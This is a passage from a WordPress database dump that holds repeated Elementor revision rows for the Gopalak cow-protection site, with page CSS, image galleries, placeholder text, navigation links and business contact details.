.elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/values.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/values.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/values-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/values-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/values-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/values-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/values-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/values-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/values-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-13 18:01:46','2022-10-13 12:31:46','',1373,'https://gopalak.in/?p=1732',0,'revision','',0),(1733,1,'2022-10-13 18:02:46','2022-10-13 12:32:46','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"960\" height=\"1010\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 960px) 100vw, 960px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-karolina-grabowska-4219654-scaled.jpg\" alt=\"pexels-karolina-grabowska-4219654\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-ave-calvar-martinez-3637852-scaled.jpg\" alt=\"pexels-ave-calvar-martinez-3637852\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/values.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/values.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/values-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/values-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/values-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/values-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/values-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/values-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/values-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-13 18:02:46','2022-10-13 12:32:46','',1373,'https://gopalak.in/?p=1733',0,'revision','',0),(1734,1,'2022-10-13 18:02:46','2022-10-13 12:32:46','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"960\" height=\"1010\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 960px) 100vw, 960px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-karolina-grabowska-4219654-scaled.jpg\" alt=\"pexels-karolina-grabowska-4219654\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-ave-calvar-martinez-3637852-scaled.jpg\" alt=\"pexels-ave-calvar-martinez-3637852\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/values.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/values.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/values-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/values-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/values-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/values-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/values-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/values-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/values-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-13 18:02:46','2022-10-13 12:32:46','',1373,'https://gopalak.in/?p=1734',0,'revision','',0),(1735,1,'2022-10-13 18:02:46','2022-10-13 12:32:46','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-karolina-grabowska-4219654-scaled.jpg\" alt=\"pexels-karolina-grabowska-4219654\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-ave-calvar-martinez-3637852-scaled.jpg\" alt=\"pexels-ave-calvar-martinez-3637852\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" 